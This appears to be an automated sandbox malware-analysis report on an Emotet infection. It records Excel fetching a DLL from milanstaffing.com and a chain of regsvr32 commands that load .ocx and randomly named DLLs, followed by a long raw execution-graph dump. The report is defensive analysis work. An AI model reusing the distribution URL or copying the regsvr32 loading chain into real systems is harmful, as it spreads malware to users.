                                  Set-Cookie: 628b3cb29fefc=1653292210; expires=Mon, 23-May-2022 07:51:10 GMT; Max-Age=60; path=/
                                  Last-Modified: Mon, 23 May 2022 07:50:10 GMT
                                  Content-Length: 371200
                                  X-Content-Type-Options: nosniff
                                  Vary: User-Agent
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  3 | 192.168.2.22 | 49174 | 107.189.3.39 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Timestamp | kBytes transferred | Direction | Data
                                  May 23, 2022 09:50:16.716734886 CEST | 1041 | OUT | GET /images/D4TRnDubF/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: milanstaffing.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:16.812772036 CEST | 1043 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  x-powered-by: PHP/7.0.33
                                  set-cookie: 628b3cb8b9778=1653292216; expires=Mon, 23-May-2022 07:51:16 GMT; Max-Age=60; path=/
                                  cache-control: no-cache, must-revalidate
                                  pragma: no-cache
                                  last-modified: Mon, 23 May 2022 07:50:16 GMT
                                  expires: Mon, 23 May 2022 07:50:16 GMT
                                  content-type: application/x-msdownload
                                  content-disposition: attachment; filename="T35PENELLOsp.dll"
                                  content-transfer-encoding: binary
                                  content-length: 371200
                                  date: Mon, 23 May 2022 07:50:16 GMT
                                  server: LiteSpeed
                                  vary: User-Agent



                                  Target ID:0
                                  Start time:09:50:12
                                  Start date:23/05/2022
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13fad0000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:3
                                  Start time:09:50:22
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:4
                                  Start time:09:50:24
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:5
                                  Start time:09:50:24
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:6
                                  Start time:09:50:27
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:7
                                  Start time:09:50:29
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:8
                                  Start time:09:50:31
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:9
                                  Start time:09:50:35
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:10
                                  Start time:09:50:37
                                  Start date:23/05/2022
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
                                  Imagebase:0xffa30000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high


                                    Execution Graph

                                    Execution Coverage:7.3%
                                    Dynamic/Decrypted Code Coverage:2.3%
                                    Signature Coverage:10.3%
                                    Total number of Nodes:1849
                                    Total number of Limit Nodes:30
7fef9d3ef10 25 API calls 17247->17250 17248->17246 17249->17251 17254 7fef9d3eec0 25 API calls 17249->17254 17250->17249 17252 7fef9d3eca1 17251->17252 17257 7fef9d3dbb5 17251->17257 17253 7fef9d2bd70 _invalid_parameter 17 API calls 17252->17253 17255 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17252->17255 17253->17255 17254->17251 17256 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17255->17256 17258 7fef9d3ed9e 17256->17258 17260 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17260 17260->17255 17261->17249 17271 7fef9d3f000 17261->17271 17278 7fef9d3ee40 17261->17278 17264 7fef9d3eed7 17263->17264 17265 7fef9d3ef07 17264->17265 17266 7fef9d3ee40 25 API calls 17264->17266 17265->17242 17266->17264 17269 7fef9d3ef2c 17267->17269 17268 7fef9d3ef4d 17268->17245 17269->17268 17270 7fef9d3ee40 25 API calls 17269->17270 17270->17269 17272 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17271->17272 17275 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17271->17275 17273 7fef9d3f276 _CrtMemDumpAllObjectsSince 17272->17273 17272->17275 17276 7fef9d3f146 _CrtMemDumpAllObjectsSince 17272->17276 17274 7fef9d3f29d MultiByteToWideChar 17273->17274 17274->17275 17275->17261 17276->17275 17277 7fef9d3f1b5 MultiByteToWideChar 17276->17277 17277->17275 17279 7fef9d3ee62 17278->17279 17281 7fef9d3ee6e 17279->17281 17282 7fef9d3f360 17279->17282 17281->17261 17283 7fef9d3f719 17282->17283 17284 7fef9d3f399 17282->17284 17287 7fef9d40170 23 API calls 17283->17287 17317 7fef9d3f4f2 17283->17317 17318 7fef9d3afb0 17284->17318 17287->17317 17288 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17290 7fef9d3f7c5 17288->17290 17289 7fef9d3f3ed 17293 7fef9d3f4c7 17289->17293 17294 7fef9d3afb0 _fflush_nolock 17 API calls 17289->17294 17290->17281 17291 7fef9d3afb0 _fflush_nolock 17 API calls 17292 7fef9d3f3b8 17291->17292 17292->17289 17295 7fef9d3afb0 _fflush_nolock 17 API calls 17292->17295 17293->17317 17322 7fef9d40170 17293->17322 17297 
7fef9d3f43d 17294->17297 17299 7fef9d3f3ca 17295->17299 17298 7fef9d3f484 17297->17298 17300 7fef9d3afb0 _fflush_nolock 17 API calls 17297->17300 17298->17293 17303 7fef9d3f561 17298->17303 17301 7fef9d3afb0 _fflush_nolock 17 API calls 17299->17301 17302 7fef9d3f44f 17300->17302 17301->17289 17302->17298 17306 7fef9d3afb0 _fflush_nolock 17 API calls 17302->17306 17304 7fef9d3afb0 _fflush_nolock 17 API calls 17303->17304 17305 7fef9d3f56e 17304->17305 17307 7fef9d3f5b8 17305->17307 17309 7fef9d3afb0 _fflush_nolock 17 API calls 17305->17309 17308 7fef9d3f461 17306->17308 17307->17283 17312 7fef9d3f604 17307->17312 17310 7fef9d3afb0 _fflush_nolock 17 API calls 17308->17310 17311 7fef9d3f580 17309->17311 17310->17298 17311->17307 17314 7fef9d3afb0 _fflush_nolock 17 API calls 17311->17314 17313 7fef9d3b530 wctomb_s 19 API calls 17312->17313 17313->17317 17315 7fef9d3f592 17314->17315 17316 7fef9d3afb0 _fflush_nolock 17 API calls 17315->17316 17316->17307 17317->17288 17320 7fef9d3afc1 17318->17320 17319 7fef9d3b04b 17319->17289 17319->17291 17320->17319 17321 7fef9d2bd70 _invalid_parameter 17 API calls 17320->17321 17321->17319 17323 7fef9d40185 17322->17323 17324 7fef9d3afb0 _fflush_nolock 17 API calls 17323->17324 17326 7fef9d401c7 17324->17326 17325 7fef9d401dc 17325->17317 17326->17325 17327 7fef9d3ab10 17 API calls 17326->17327 17328 7fef9d40326 17326->17328 17327->17328 17328->17325 17329 7fef9d39290 23 API calls 17328->17329 17329->17325 17330 7fef9d25a25 17331 7fef9d25a37 17330->17331 17332 7fef9d2bd70 _invalid_parameter 17 API calls 17331->17332 17333 7fef9d25aaf 17332->17333 18224 7fef9d34920 18227 7fef9d3d530 18224->18227 18230 7fef9d3d580 18227->18230 18231 7fef9d3d59a std::exception::_Tidy 18230->18231 18232 7fef9d3493d 18230->18232 18231->18232 18233 7fef9d3d660 std::exception::_Copy_str 17 API calls 18231->18233 18233->18232 18238 7fef9d29328 18239 7fef9d29336 EnterCriticalSection 18238->18239 18240 7fef9d2932c 18238->18240 18240->18239 18241 7fef9d3ff2d 
18242 7fef9d3ff37 18241->18242 18243 7fef9d40042 18242->18243 18244 7fef9d3ff47 18242->18244 18256 7fef9d29360 LeaveCriticalSection 18243->18256 18245 7fef9d4003d 18244->18245 18248 7fef9d3ae90 _lock_file2 EnterCriticalSection 18244->18248 18247 7fef9d4004c 18249 7fef9d3ff97 18248->18249 18250 7fef9d3ffd0 18249->18250 18252 7fef9d3ffe1 18249->18252 18253 7fef9d3ffbb 18249->18253 18251 7fef9d3af60 _unlock_file2 2 API calls 18250->18251 18251->18245 18252->18250 18255 7fef9d3fd70 _fflush_nolock 25 API calls 18252->18255 18254 7fef9d3fd70 _fflush_nolock 25 API calls 18253->18254 18254->18250 18255->18250 18256->18247 18261 7fef9d2b12b 18262 7fef9d2b14c 18261->18262 18263 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18262->18263 18265 7fef9d2b2e0 18262->18265 18263->18265 18264 7fef9d2b33e 18277 7fef9d30cc0 18264->18277 18265->18264 18266 7fef9d2d490 std::exception::_Copy_str 17 API calls 18265->18266 18268 7fef9d2b311 18266->18268 18271 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18268->18271 18270 7fef9d2b37d 18275 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18270->18275 18271->18264 18272 7fef9d2cff0 terminate 34 API calls 18273 7fef9d2b373 18272->18273 18274 7fef9d27090 _exit 33 API calls 18273->18274 18274->18270 18276 7fef9d2b3a0 18275->18276 18295 7fef9d23d00 RtlEncodePointer 18277->18295 18279 7fef9d30cf6 18280 7fef9d30d23 LoadLibraryW 18279->18280 18281 7fef9d30e15 18279->18281 18282 7fef9d30d44 GetProcAddress 18280->18282 18290 7fef9d30d3d 18280->18290 18284 7fef9d30e39 DecodePointer DecodePointer 18281->18284 18292 7fef9d30e68 18281->18292 18283 7fef9d30d6a 7 API calls 18282->18283 18282->18290 18283->18281 18287 7fef9d30df3 GetProcAddress EncodePointer 18283->18287 18284->18292 18285 7fef9d30f60 DecodePointer 18285->18290 18286 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18291 7fef9d2b358 18286->18291 18287->18281 18288 7fef9d30eed DecodePointer 18289 7fef9d30f0d 18288->18289 18289->18285 18293 7fef9d30f2f DecodePointer 
18289->18293 18290->18286 18291->18270 18291->18272 18292->18288 18292->18289 18294 7fef9d30ec8 18292->18294 18293->18285 18293->18294 18294->18285 18295->18279 18296 7fef9d234d5 18297 7fef9d234da _calloc_dbg 18296->18297 18298 7fef9d2350b FlsSetValue 18297->18298 18302 7fef9d23548 18297->18302 18299 7fef9d23520 18298->18299 18298->18302 18300 7fef9d23e30 LeaveCriticalSection 18299->18300 18301 7fef9d2352c GetCurrentThreadId 18300->18301 18301->18302 18303 7fef9d25ad9 18304 7fef9d25add 18303->18304 18305 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18304->18305 18306 7fef9d25b3a 18305->18306 18309 7fef9d29360 LeaveCriticalSection 18306->18309 18308 7fef9d25c14 18309->18308 17343 7fef9d233d6 17346 7fef9d288d0 HeapDestroy 17343->17346 17345 7fef9d233db 17346->17345 18321 7fef9d266da 18322 7fef9d26725 18321->18322 18325 7fef9d26745 18321->18325 18322->18325 18327 7fef9d29a70 18322->18327 18324 7fef9d2677f 18325->18324 18326 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18325->18326 18326->18324 18329 7fef9d29a79 _updatetlocinfoEx_nolock 18327->18329 18328 7fef9d29ad8 18328->18325 18329->18328 18331 7fef9d29360 LeaveCriticalSection 18329->18331 18331->18328 18332 7fef9d268c4 18334 7fef9d268d1 18332->18334 18333 7fef9d26ba6 18350 7fef9d29360 LeaveCriticalSection 18333->18350 18334->18333 18337 7fef9d268ed _CrtIsValidPointer 18334->18337 18336 7fef9d26bb0 18338 7fef9d2695e IsBadReadPtr 18337->18338 18339 7fef9d26976 18337->18339 18348 7fef9d2692f 18337->18348 18338->18339 18340 7fef9d26ad2 18339->18340 18341 7fef9d26a29 18339->18341 18342 7fef9d26add 18340->18342 18345 7fef9d26b2d 18340->18345 18343 7fef9d26abe 18341->18343 18344 7fef9d26a86 IsBadReadPtr 18341->18344 18347 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18342->18347 18346 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18343->18346 18344->18343 18344->18348 18345->18348 18349 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18345->18349 18346->18348 18347->18348 
18349->18348 18350->18336 18351 7fef9d376c0 18352 7fef9d376cf _CrtMemDumpAllObjectsSince 18351->18352 18353 7fef9d37be3 _CrtMemDumpAllObjectsSince 18351->18353 18355 7fef9d37905 _CrtMemDumpAllObjectsSince 18352->18355 18356 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18352->18356 18364 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18352->18364 18354 7fef9d37cc6 WideCharToMultiByte 18353->18354 18353->18364 18354->18364 18357 7fef9d3790f WideCharToMultiByte 18355->18357 18360 7fef9d37827 WideCharToMultiByte 18356->18360 18359 7fef9d37965 18357->18359 18358 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18361 7fef9d37d85 18358->18361 18362 7fef9d3799a GetLastError 18359->18362 18359->18364 18360->18364 18362->18364 18365 7fef9d379d3 _CrtMemDumpAllObjectsSince 18362->18365 18363 7fef9d37a05 WideCharToMultiByte 18363->18364 18363->18365 18364->18358 18365->18363 18365->18364 17359 7fef9d2f7f1 17360 7fef9d2f80d 17359->17360 17381 7fef9d2f8de _wcsftime_l 17359->17381 17416 7fef9d36fb0 17360->17416 17362 7fef9d2fa70 17423 7fef9d369c0 17362->17423 17364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17367 7fef9d2f85a OutputDebugStringA 17364->17367 17366 7fef9d2f9f4 17366->17362 17370 7fef9d2d490 std::exception::_Copy_str 17 API calls 17366->17370 17371 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17367->17371 17368 7fef9d2fa8a 17369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17368->17369 17372 7fef9d2fab7 17369->17372 17373 7fef9d2fa43 17370->17373 17375 7fef9d2f8ce 17371->17375 17377 7fef9d2fb24 17372->17377 17379 7fef9d369c0 17 API calls 17372->17379 17392 7fef9d2fb6a 17372->17392 17376 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17373->17376 17386 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17375->17386 17376->17362 17380 7fef9d369c0 17 API calls 17377->17380 17378 7fef9d2f996 17378->17366 17388 7fef9d2d490 std::exception::_Copy_str 17 API calls 17378->17388 17382 7fef9d2faf7 17379->17382 17383 
7fef9d2fb3d 17380->17383 17381->17366 17381->17378 17387 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17381->17387 17384 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17382->17384 17385 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17383->17385 17384->17377 17385->17392 17389 7fef9d3011d 17386->17389 17387->17378 17390 7fef9d2f9c7 17388->17390 17391 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17390->17391 17391->17366 17393 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17392->17393 17394 7fef9d2fc39 17392->17394 17393->17394 17395 7fef9d2fc97 17394->17395 17396 7fef9d2d490 std::exception::_Copy_str 17 API calls 17394->17396 17436 7fef9d36970 17395->17436 17398 7fef9d2fc6a 17396->17398 17400 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17398->17400 17400->17395 17401 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17402 7fef9d2fd6e 17401->17402 17403 7fef9d31640 17 API calls 17402->17403 17413 7fef9d2fdbb 17402->17413 17404 7fef9d2fd8e 17403->17404 17405 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17404->17405 17405->17413 17406 7fef9d2ffef 17407 7fef9d30008 OutputDebugStringA 17406->17407 17408 7fef9d30016 17406->17408 17407->17408 17408->17375 17412 7fef9d36fb0 _itow_s 17 API calls 17408->17412 17410 7fef9d2ff03 std::exception::_Copy_str 17410->17375 17410->17406 17411 7fef9d2ffaa WriteFile 17410->17411 17411->17406 17414 7fef9d30065 17412->17414 17413->17410 17439 7fef9d29360 LeaveCriticalSection 17413->17439 17415 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17414->17415 17415->17375 17417 7fef9d37003 17416->17417 17418 7fef9d36fd6 17416->17418 17420 7fef9d37030 _itow_s 17 API calls 17417->17420 17418->17417 17419 7fef9d36fdd 17418->17419 17440 7fef9d37030 17419->17440 17422 7fef9d2f82d 17420->17422 17422->17364 17424 7fef9d369e1 17423->17424 17425 7fef9d36a42 17424->17425 17427 7fef9d36a80 _calloc_dbg_impl 17424->17427 17426 7fef9d2bd70 _invalid_parameter 17 API calls 17425->17426 17434 7fef9d36a76 _calloc_dbg_impl 17426->17434 
17428 7fef9d36b6e 17427->17428 17432 7fef9d36bac _calloc_dbg_impl 17427->17432 17430 7fef9d2bd70 _invalid_parameter 17 API calls 17428->17430 17429 7fef9d36ce8 17433 7fef9d2bd70 _invalid_parameter 17 API calls 17429->17433 17430->17434 17431 7fef9d36d26 _calloc_dbg_impl 17431->17434 17435 7fef9d2bd70 _invalid_parameter 17 API calls 17431->17435 17432->17429 17432->17431 17433->17434 17434->17368 17435->17434 17456 7fef9d363e0 17436->17456 17438 7fef9d2fd20 17438->17401 17439->17410 17441 7fef9d37055 17440->17441 17442 7fef9d370ab 17441->17442 17444 7fef9d370e9 17441->17444 17443 7fef9d2bd70 _invalid_parameter 17 API calls 17442->17443 17453 7fef9d370df 17443->17453 17445 7fef9d3714a 17444->17445 17446 7fef9d37188 _calloc_dbg_impl 17444->17446 17447 7fef9d2bd70 _invalid_parameter 17 API calls 17445->17447 17448 7fef9d37287 17446->17448 17451 7fef9d372c5 17446->17451 17447->17453 17449 7fef9d2bd70 _invalid_parameter 17 API calls 17448->17449 17449->17453 17450 7fef9d37338 17452 7fef9d2bd70 _invalid_parameter 17 API calls 17450->17452 17451->17450 17454 7fef9d37376 17451->17454 17452->17453 17453->17422 17454->17453 17455 7fef9d2bd70 _invalid_parameter 17 API calls 17454->17455 17455->17453 17457 7fef9d3640e 17456->17457 17458 7fef9d3648e 17457->17458 17460 7fef9d364cc _calloc_dbg_impl 17457->17460 17459 7fef9d2bd70 _invalid_parameter 17 API calls 17458->17459 17466 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17459->17466 17461 7fef9d3668e _CrtMemDumpAllObjectsSince 17460->17461 17462 7fef9d3663f 17460->17462 17468 7fef9d35ea0 17461->17468 17464 7fef9d2bd70 _invalid_parameter 17 API calls 17462->17464 17464->17466 17465 7fef9d366b5 _calloc_dbg_impl 17465->17466 17467 7fef9d2bd70 _invalid_parameter 17 API calls 17465->17467 17466->17438 17467->17466 17469 7fef9d35ecf 17468->17469 17470 7fef9d35fae 17469->17470 17471 7fef9d35f6e 17469->17471 17478 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17469->17478 17472 7fef9d35fcf 
_CrtMemDumpAllObjectsSince 17470->17472 17473 7fef9d362e1 _CrtMemDumpAllObjectsSince 17470->17473 17474 7fef9d2bd70 _invalid_parameter 17 API calls 17471->17474 17476 7fef9d360a1 MultiByteToWideChar 17472->17476 17472->17478 17475 7fef9d3632f MultiByteToWideChar 17473->17475 17473->17478 17474->17478 17475->17478 17477 7fef9d3610e GetLastError 17476->17477 17476->17478 17477->17478 17479 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 17477->17479 17478->17465 17479->17478 17480 7fef9d36238 MultiByteToWideChar 17479->17480 17480->17478 16448 7fef9d26ff2 16449 7fef9d26ffe 16448->16449 16452 7fef9d2ca00 16449->16452 16451 7fef9d27011 _initterm_e 16455 7fef9d2ca0e 16452->16455 16453 7fef9d2ca23 EncodePointer 16453->16455 16454 7fef9d2ca4b 16454->16451 16455->16453 16455->16454 18421 7fef9d3e2fc 18422 7fef9d3e309 get_int64_arg _get_printf_count_output 18421->18422 18423 7fef9d3e38c 18422->18423 18424 7fef9d3e3e1 18422->18424 18428 7fef9d2bd70 _invalid_parameter 17 API calls 18423->18428 18425 7fef9d3eadf 18424->18425 18426 7fef9d3eec0 25 API calls 18424->18426 18435 7fef9d3da75 18424->18435 18427 7fef9d3ef10 25 API calls 18425->18427 18426->18425 18429 7fef9d3eafd 18427->18429 18441 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18428->18441 18430 7fef9d3eb33 18429->18430 18432 7fef9d3eec0 25 API calls 18429->18432 18431 7fef9d3ec29 18430->18431 18445 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18430->18445 18433 7fef9d3ebda 18431->18433 18434 7fef9d3ef10 25 API calls 18431->18434 18432->18430 18433->18435 18440 7fef9d3eec0 25 API calls 18433->18440 18434->18433 18437 7fef9d3eca1 18435->18437 18442 7fef9d3dbb5 18435->18442 18436 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18438 7fef9d3ed9e 18436->18438 18439 7fef9d2bd70 _invalid_parameter 17 API calls 18437->18439 18437->18441 18439->18441 18440->18435 18441->18436 18444 7fef9d2bd70 _invalid_parameter 17 API calls 18442->18444 18443 7fef9d3f000 wcsxfrm 2 API calls 18443->18445 18444->18441 18445->18433 18445->18443 
18446 7fef9d3ee40 25 API calls 18445->18446 18446->18445 17485 7fef9d253fb 17486 7fef9d2541d _realloc_dbg 17485->17486 17488 7fef9d25421 17486->17488 17491 7fef9d26380 17486->17491 17489 7fef9d254de _calloc_dbg_impl _realloc_dbg 17495 7fef9d2c020 17489->17495 17492 7fef9d26391 17491->17492 17493 7fef9d26395 _CrtIsValidPointer 17491->17493 17492->17489 17493->17492 17494 7fef9d263b6 HeapValidate 17493->17494 17494->17492 17496 7fef9d2c039 _get_errno_from_oserr 17495->17496 17497 7fef9d2c03b HeapFree 17495->17497 17496->17488 17497->17496 17498 7fef9d2c05a GetLastError 17497->17498 17498->17496 16521 7fef9d235e1 16522 7fef9d235f1 16521->16522 16526 7fef9d235ea 16521->16526 16522->16526 16527 7fef9d212b0 16522->16527 16525 7fef9d212b0 14 API calls 16525->16526 16528 7fef9d212de CoLoadLibrary 16527->16528 16534 7fef9d22f8c 16527->16534 16530 7fef9d22f0f MessageBoxA ExitProcess 16528->16530 16531 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16528->16531 16529 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16532 7fef9d230ff 16529->16532 16533 7fef9d22f73 _calloc_dbg_impl 16531->16533 16531->16534 16532->16525 16532->16526 16535 7fef9d22f83 CoTaskMemFree 16533->16535 16534->16529 16535->16534 17499 7fef9d23fe1 17500 7fef9d23fea SetLastError 17499->17500 16536 7fef9d27de0 16537 7fef9d27ded 16536->16537 16539 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16536->16539 16543 7fef9d2aa40 16537->16543 16540 7fef9d27e0e 16539->16540 16547 7fef9d2d490 16539->16547 16557 7fef9d27ff0 16539->16557 16544 7fef9d2aa4d 16543->16544 16546 7fef9d2aa57 16543->16546 16561 7fef9d29c10 16544->16561 16546->16539 16549 7fef9d2d4b1 16547->16549 16548 7fef9d2d512 16550 7fef9d2bd70 _invalid_parameter 17 API calls 16548->16550 16549->16548 16551 7fef9d2d550 _calloc_dbg_impl 16549->16551 16553 7fef9d2d546 _calloc_dbg_impl 16550->16553 16552 7fef9d2d63e 